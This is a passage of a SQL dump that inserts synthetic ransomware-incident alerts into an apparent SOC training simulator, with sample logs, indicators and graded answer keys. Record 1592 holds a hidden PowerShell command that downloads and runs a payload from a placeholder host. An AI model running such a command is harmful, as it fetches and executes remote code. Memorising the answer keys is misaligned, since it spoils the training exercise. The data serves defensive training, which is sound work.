created\\\",\\\"task_to_run\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tasks\\\\\\\\malicious_script.bat\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"enabled\\\":\\\"true\\\",\\\"ip_address\\\":\\\"192.168.1.102\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\\\",\\\"username\\\":\\\"administrator\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.640Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"timestamp\\\":\\\"2023-10-03T11:45:32Z\\\",\\\"task_name\\\":\\\"Windows_Update_12\\\",\\\"task_path\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Create\\\",\\\"description\\\":\\\"A scheduled task was 
created\\\",\\\"task_to_run\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tasks\\\\\\\\malicious_script.bat\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"enabled\\\":\\\"true\\\",\\\"ip_address\\\":\\\"192.168.1.102\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\\\",\\\"username\\\":\\\"administrator\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.640Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"event_id\\\":4698,\\\"timestamp\\\":\\\"2023-10-03T11:45:32Z\\\",\\\"task_name\\\":\\\"Windows_Update_12\\\",\\\"task_path\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"action\\\":\\\"Create\\\",\\\"description\\\":\\\"A scheduled task was created\\\",\\\"task_to_run\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\tasks\\\\\\\\malicious_script.bat\\\",\\\"author\\\":\\\"SYSTEM\\\",\\\"trigger\\\":\\\"Daily\\\",\\\"enabled\\\":\\\"true\\\",\\\"ip_address\\\":\\\"192.168.1.102\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"a9f5d9e7f6c3b2a1d4e8c9b1f2a6e5c4\\\",\\\"username\\\":\\\"administrator\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1590, 'Lateral Movement Detected', 'high', 'Network traffic analysis', 'An unauthorized lateral movement was detected within the network. The attacker utilized compromised credentials to connect to multiple internal systems, potentially to identify and encrypt additional targets. This action follows the establishment of persistence and aims to maximize impact before initiating negotiations.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:32:00Z\",\"source_ip\":\"45.76.112.34\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe_admin\",\"connection_method\":\"RDP\",\"file_accessed\":\"C:\\\\Sensitive\\\\encrypt.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"logon_type\":\"RemoteInteractive\",\"event_id\":4624,\"event_description\":\"An account was successfully logged on.\"}', '2026-03-15 19:16:21', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.112.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with previous ransomware attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Inventory\",\"verdict\":\"internal\",\"details\":\"IP belongs to an internal server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account recently accessed from an unusual location.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypt.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Executable linked to ransomware 
activities.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a known malware sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1591, 'Spear Phishing Email Detected', 'high', 'Email security gateway logs', 'A spear phishing email was detected targeting an employee with a malicious link intended to harvest credentials. The email originated from a known malicious IP address associated with the Maze ransomware group.', 'Phishing', 'T1566.001', 1, 'investigating', 214, '{\"timestamp\":\"2023-10-15T14:22:05Z\",\"email_id\":\"12345abcde\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"sender\":\"attacker@evilmail.com\",\"recipient\":\"employee@company.com\",\"subject\":\"Urgent: Action Required\",\"body\":\"Please review the attached document to avoid service interruption.\",\"attachment\":\"Invoice_1023.pdf\",\"malicious_link\":\"http://maliciouslink.com/login\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"}', '2026-03-15 19:16:51', '2026-03-16 01:46:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Maze ransomware operations.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"attacker@evilmail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in previous phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciouslink.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious PDF 
attachments.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.652Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1592, 'Malware Execution in User Workstation', 'high', 'Endpoint detection and response (EDR) logs', 'Upon clicking the malicious link, the victim unknowingly executes a ransomware payload, marking the beginning of Maze\'s execution phase. The malware is observed executing from a suspicious directory, with network connections to a known malicious IP.', 'Malware Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"process_creation\",\"source_ip\":\"10.0.0.5\",\"destination_ip\":\"185.92.220.100\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://maliciousdomain.com/payload\');\",\"file_path\":\"C:\\\\Users\\\\victim\\\\AppData\\\\Local\\\\Temp\\\\ransomware.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"victim_user\",\"destination_domain\":\"maliciousdomain.com\"}', '2026-03-15 19:16:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple ransomware campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known Maze ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenDNS\",\"verdict\":\"malicious\",\"details\":\"Domain used for distributing malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"suspicious\",\"details\":\"Filename associated with unauthorized 
processes\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"victim_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1593, 'Establishing Persistence via Scheduled Task', 'high', 'Windows event logs', 'The Maze operators have created a scheduled task on the compromised machine, ensuring the ransomware remains active even after reboots. This allows them to maintain persistence in the system.', 'Persistence Mechanism', 'T1053.005', 1, 'new', NULL, '{\"EventID\":4698,\"Task Category\":\"Scheduled Task Created\",\"Computer\":\"compromised-host.local\",\"User\":\"JohnDoe\",\"Scheduled Task Name\":\"\\\\Microsoft\\\\Windows\\\\UpdateSecurity\",\"Action\":\"Create\",\"Parameters\":{\"Program\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Arguments\":\"/c start C:\\\\Users\\\\JohnDoe\\\\AppData\\\\Roaming\\\\maze.exe\",\"Triggers\":\"At startup\"},\"Logon ID\":\"0x3e7\",\"Source Network Address\":\"45.76.123.23\",\"MD5 Hash\":\"4d186321c1a7f0f354b297e8914ab240\",\"Internal IP\":\"192.168.1.5\"}', '2026-03-15 19:16:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"45.76.123.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malicious IP Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Maze ransomware activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4d186321c1a7f0f354b297e8914ab240\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of a known Maze ransomware file\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"JohnDoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"Task Category\\\":\\\"Scheduled Task Created\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"User\\\":\\\"JohnDoe\\\",\\\"Scheduled Task Name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateSecurity\\\",\\\"Action\\\":\\\"Create\\\",\\\"Parameters\\\":{\\\"Program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\JohnDoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\maze.exe\\\",\\\"Triggers\\\":\\\"At startup\\\"},\\\"Logon ID\\\":\\\"0x3e7\\\",\\\"Source Network Address\\\":\\\"45.76.123.23\\\",\\\"MD5 Hash\\\":\\\"4d186321c1a7f0f354b297e8914ab240\\\",\\\"Internal IP\\\":\\\"192.168.1.5\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"Task Category\\\":\\\"Scheduled Task Created\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"User\\\":\\\"JohnDoe\\\",\\\"Scheduled Task Name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateSecurity\\\",\\\"Action\\\":\\\"Create\\\",\\\"Parameters\\\":{\\\"Program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\JohnDoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\maze.exe\\\",\\\"Triggers\\\":\\\"At startup\\\"},\\\"Logon ID\\\":\\\"0x3e7\\\",\\\"Source Network Address\\\":\\\"45.76.123.23\\\",\\\"MD5 Hash\\\":\\\"4d186321c1a7f0f354b297e8914ab240\\\",\\\"Internal IP\\\":\\\"192.168.1.5\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"Task Category\\\":\\\"Scheduled Task Created\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"User\\\":\\\"JohnDoe\\\",\\\"Scheduled Task Name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateSecurity\\\",\\\"Action\\\":\\\"Create\\\",\\\"Parameters\\\":{\\\"Program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\JohnDoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\maze.exe\\\",\\\"Triggers\\\":\\\"At startup\\\"},\\\"Logon ID\\\":\\\"0x3e7\\\",\\\"Source Network Address\\\":\\\"45.76.123.23\\\",\\\"MD5 Hash\\\":\\\"4d186321c1a7f0f354b297e8914ab240\\\",\\\"Internal IP\\\":\\\"192.168.1.5\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"Task Category\\\":\\\"Scheduled Task Created\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"User\\\":\\\"JohnDoe\\\",\\\"Scheduled Task Name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateSecurity\\\",\\\"Action\\\":\\\"Create\\\",\\\"Parameters\\\":{\\\"Program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\JohnDoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\maze.exe\\\",\\\"Triggers\\\":\\\"At startup\\\"},\\\"Logon ID\\\":\\\"0x3e7\\\",\\\"Source Network Address\\\":\\\"45.76.123.23\\\",\\\"MD5 Hash\\\":\\\"4d186321c1a7f0f354b297e8914ab240\\\",\\\"Internal IP\\\":\\\"192.168.1.5\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.663Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"Task Category\\\":\\\"Scheduled Task 
Created\\\",\\\"Computer\\\":\\\"compromised-host.local\\\",\\\"User\\\":\\\"JohnDoe\\\",\\\"Scheduled Task Name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateSecurity\\\",\\\"Action\\\":\\\"Create\\\",\\\"Parameters\\\":{\\\"Program\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c start C:\\\\\\\\Users\\\\\\\\JohnDoe\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\maze.exe\\\",\\\"Triggers\\\":\\\"At startup\\\"},\\\"Logon ID\\\":\\\"0x3e7\\\",\\\"Source Network Address\\\":\\\"45.76.123.23\\\",\\\"MD5 Hash\\\":\\\"4d186321c1a7f0f354b297e8914ab240\\\",\\\"Internal IP\\\":\\\"192.168.1.5\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1594, 'Lateral Movement Detected in Network', 'high', 'Network traffic analysis', 'Using harvested credentials, Maze moves laterally across the network, accessing multiple systems and escalating their control. Unusual network connections were detected from an internal host to multiple internal systems.', 'Lateral Movement', 'T1021.002 - SMB/Windows Admin Shares', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:45Z\",\"event_type\":\"network_connection\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"192.168.1.104\",\"protocol\":\"SMB\",\"user\":\"j.doe@company.com\",\"external_attacker_ip\":\"203.0.113.45\",\"file_hash\":\"3a6eb8d2c5f78b1d1f7e6a34b5cfc6f8\",\"filename\":\"executable.exe\",\"detected_by\":\"IDS\",\"action_taken\":\"alert\"}', '2026-03-15 19:16:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.104\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Another internal IP address targeted by the attacker.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with Maze activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3a6eb8d2c5f78b1d1f7e6a34b5cfc6f8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Maze malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"executable.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Suspicious executable used in lateral 
movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User credentials were used to facilitate lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1595, 'Data Exfiltration to External Server', 'high', 'Firewall logs', 'Maze completes their attack by exfiltrating sensitive data to an external server, setting the stage for their double extortion tactic by threatening data leaks. The firewall detected unusual outbound traffic to a known malicious IP address, along with the transfer of a file with a suspicious hash.', 'Data Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:25:43Z\",\"firewall_id\":\"FW-12345\",\"action\":\"ALLOW\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"src_port\":56789,\"dst_port\":443,\"protocol\":\"TCP\",\"username\":\"jdoe\",\"file_name\":\"data_dump.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"bytes_sent\":10485760,\"outbound_bytes\":10485760,\"threat_intel\":{\"dst_ip\":{\"reputation\":\"malicious\",\"last_seen\":\"2023-10-10\"},\"file_hash\":{\"reputation\":\"malicious\",\"last_seen\":\"2023-10-11\"}}}', '2026-03-15 19:16:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"Known command-and-control server for Maze APT\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Maze APT\'s data exfiltration tool\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"data_dump.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual file transfer detected\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Active directory 
user\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1596, 'Phishing Campaign Targets Retail Employees', 'high', 'Email Gateway Logs', 'The operation begins as Egregor launches a sophisticated phishing campaign aimed at retail employees, leveraging Maze\'s social engineering tactics to gain initial access. An email was detected containing a malicious link and attachment.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"email_subject\":\"Urgent: Action Required on Your Account\",\"sender_email\":\"support@fakestore.com\",\"recipient_email\":\"jdoe@retailcompany.com\",\"malicious_url\":\"http://malicious-link.com/login\",\"attachment_filename\":\"Invoice_12345.pdf\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\"}', '2026-03-15 19:17:07', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known phishing operation IP associated with Egregor.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted employee.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used to harvest credentials.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of known malicious PDF attachment.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"support@fakestore.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email 
Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Spoofed email address used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Campaign Targets Retail Employees\",\"date\":\"2026-03-15T20:58:15.674Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
